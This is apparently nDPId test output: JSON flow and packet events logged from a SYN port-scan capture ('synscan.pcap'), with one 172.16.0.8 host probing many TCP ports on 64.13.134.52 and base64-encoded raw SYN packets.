+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs0McAACsGTKusEAAIQA2GNIzSAtLdUoMYAAAAAGACEAAlvQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1343,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsyTwAADQGSzasEAAIQA2GNIzSwAHdUoMYAAAAAGACBAB0jQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs928AADQGHQOsEAAIQA2GNIzSH0HdUoMYAAAAAGACBAAVTgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsvbAAAC0GXcKsEAAIQA2GNIzSDSrdUoMYAAAAAGACCAAjZQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1346,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs2wcAADYGN2usEAAIQA2GNIzSEJLdUoMYAAAAAGACDAAb\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs2yMAADIGO0+sEAAIQA2GNIzSF3ndUoMYAAAAAGACDAAVFgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1348,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAsbeEAADIGqJGsEAAIQA2GNIzSDx3dUoMYAAAAAGACDAAdcgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060494,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1349,"flow_packet_id":1,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060494,"pkt":"ACYLMQczACWzv5HuCABFAAAs6ogAACUGOOqsEAAIQA2GNIzSBC3dUoMYAAAAAGACCAAsYgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060496,"flow_last_seen":1278275060496,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060496,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1350,"flow_packet_id":1,"flow_last_seen":1278275060496,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060496,"pkt":"ACYLMQczACWzv5HuCABFAAAsm4gAADYGduqsEAAIQA2GNIzSPvHdUoMYAAAAAGACDADtnQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsX1oAACYGwxisEAAIQA2GNIzTI4\/dU4MZAAAAAGACDAAI\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1352,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsZuAAAC0GtJKsEAAIQA2GNIzTFxbdU4MZAAAAAGACCAAZdgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsoCQAACcGgU6sEAAIQA2GNIzTArPdU4MZAAAAAGACEAAl2QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsZsIAACkGuLCsEAAIQA2GNIzTBqTdU4MZAAAAAGACCAAp6AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1355,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsjm8AADsGfwOsEAAIQA2GNIzTBCzdU4MZAAAAAGACEAAkYAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsNcIAADsG17CsEAAIQA2GNIzTAcrdU4MZAAAAAGACEAAmwgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1357,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsQD4AAC8G2TSsEAAIQA2GNIzTCjDdU4MZAAAAAGACEAAeXAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsRiMAACwG1k+sEAAIQA2GNIzTF0DdU4MZAAAAAGACBAAdTAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsnG0AADEGewWsEAAIQA2GNIzTCVrdU4MZAAAAAGACCAAnMgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1360,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsx\/4AACcGWXSsEAAIQA2GNIzTD6TdU4MZAAAAAGACEAAY6AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1361,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsd04AADEGoCSsEAAIQA2GNIzTAavdU4MZAAAAAGACCAAu4QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060540,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_packet_id":1,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060540,"pkt":"ACYLMQczACWzv5HuCABFAAAsVHoAADUGvvisEAAIQA2GNIzTrZrdU4MZAAAAAGACCACC8QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsHa8AADMG98OsEAAIQA2GNIzTE9\/dU4MZAAAAAGACEAAUrQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAs7BgAAC8GLVqsEAAIQA2GNIzTCIPdU4MZAAAAAGACEAAgCQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1365,"flow_packet_id":1,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060541,"pkt":"ACYLMQczACWzv5HuCABFAAAsqeUAADIGbI2sEAAIQA2GNIzSAFHdUoMYAAAAAGACDAAsPgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060541,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 